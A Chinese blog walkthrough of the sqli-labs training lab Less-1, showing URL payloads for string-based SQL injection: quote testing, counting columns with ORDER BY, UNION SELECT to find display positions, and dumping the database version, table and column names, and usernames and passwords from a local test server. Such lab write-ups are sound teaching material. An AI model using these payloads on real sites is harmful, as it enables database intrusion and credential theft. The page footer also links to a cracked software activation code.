当前位置: 首页 > news >正文

SQL注入第一关-Less1

news 来源:原创 2024/9/21 11:07:29

1、判断注入点类型

单引号测试

http://127.0.0.1/Less-1/?id=1'

报错,属于字符型注入,SQL语法有错误;

则在后面加上 --+

http://127.0.0.1/Less-1/?id=1' -- +

注:进行验证: 若是数字不相等依然报错

http://127.0.0.1/Less-1/?id=1' and 1=2 --+

2、判断字段数

order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1/Less-1/?id=1' order by  4  -- +

3、使用联合查询  确定显示位置

http://127.0.0.1/Less-1/?id=1' union select 1,2,3  -- +

     由于查询语句前面是对的,所以显示前面的内容,后面的无法显示,不能确定显示位置,所以更改语句,使得前面的语句为错,显示后面的内容:

http://127.0.0.1/Less-1/?id= -1' union select 1,2,3 --+

4、确定显示位置后,查询库名

http://127.0.0.1/Less-1/?id=-1' union select 1,version(),database() --+

字段数为3,所以1在这表示占位,version()查询数据库版本,database()查询数据库库名

5、查询表名


http://192.168.162.135/sqlilab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

6、查询列名


http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+

7、查询用户名和密码

http://127.0.0.1/Less-1/?id=-1' union select 1,username,password from users where id=2 --+

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 备战秋招60天算法挑战,Day12
  • 企业数据治理之主数据治理--组织主数据
  • 学习记录第二十天
  • 从零搭建xxl-job(四):xxljob进行一些性能优化
  • 每天写两道(数组篇)在排序数组中查找元素的第一个和最后一个位置、x的平方根
  • Linux系统编程 day09 线程同步
  • 学生公寓电费信息管理小程序的设计
  • 毛戈平,在巴黎点亮东方色彩
  • 【合集】自定义结构体 vector priority_queue set map 的构建一网打尽!(C++干货)
  • 理解栈(Stack)及其在 C++ 中的应用【栈、数据结构】
  • 每日算法2024/08/12
  • windows和office微软官方免费激活教程
  • 选择江苏G口大带宽服务器租用的优势有哪些?
  • 简单了解一下 git cherry-pick
  • 2024专业音乐创作必备Guitar Pro8永久破解版激活码
  • 收藏网友的 源程序下载网
  • es6
  • Hibernate最全面试题
  • Javascript编码规范
  • Material Design
  • PHP 7 修改了什么呢 -- 2
  • Web设计流程优化:网页效果图设计新思路
  • 爱情 北京女病人
  • 从伪并行的 Python 多线程说起
  • 第13期 DApp 榜单 :来,吃我这波安利
  • 开源地图数据可视化库——mapnik
  • 如何抓住下一波零售风口?看RPA玩转零售自动化
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 微信如何实现自动跳转到用其他浏览器打开指定页面下载APP
  • 没有任何编程基础可以直接学习python语言吗?学会后能够做什么? ...
  • ​​​​​​​ubuntu16.04 fastreid训练过程
  • #70结构体案例1(导师,学生,成绩)
  • %check_box% in rails :coditions={:has_many , :through}
  • (4)事件处理——(7)简单事件(Simple events)
  • (9)STL算法之逆转旋转
  • (第30天)二叉树阶段总结
  • (二) Windows 下 Sublime Text 3 安装离线插件 Anaconda
  • (附源码)基于SpringBoot和Vue的厨到家服务平台的设计与实现 毕业设计 063133
  • (十七)Flink 容错机制
  • (四十一)大数据实战——spark的yarn模式生产环境部署
  • (转)jdk与jre的区别
  • (转)shell调试方法
  • (转)大型网站架构演变和知识体系
  • .net 8 发布了,试下微软最近强推的MAUI
  • .NET Core工程编译事件$(TargetDir)变量为空引发的思考
  • .NET Core实战项目之CMS 第一章 入门篇-开篇及总体规划
  • .NET Framework 4.6.2改进了WPF和安全性
  • .NETCORE 开发登录接口MFA谷歌多因子身份验证
  • .NET委托:一个关于C#的睡前故事
  • .NET项目中存在多个web.config文件时的加载顺序
  • /usr/local/nginx/logs/nginx.pid failed (2: No such file or directory)
  • @Autowired自动装配
  • @EnableConfigurationProperties注解使用
  • [ C++ ] STL_vector -- 迭代器失效问题
  • [<死锁专题>]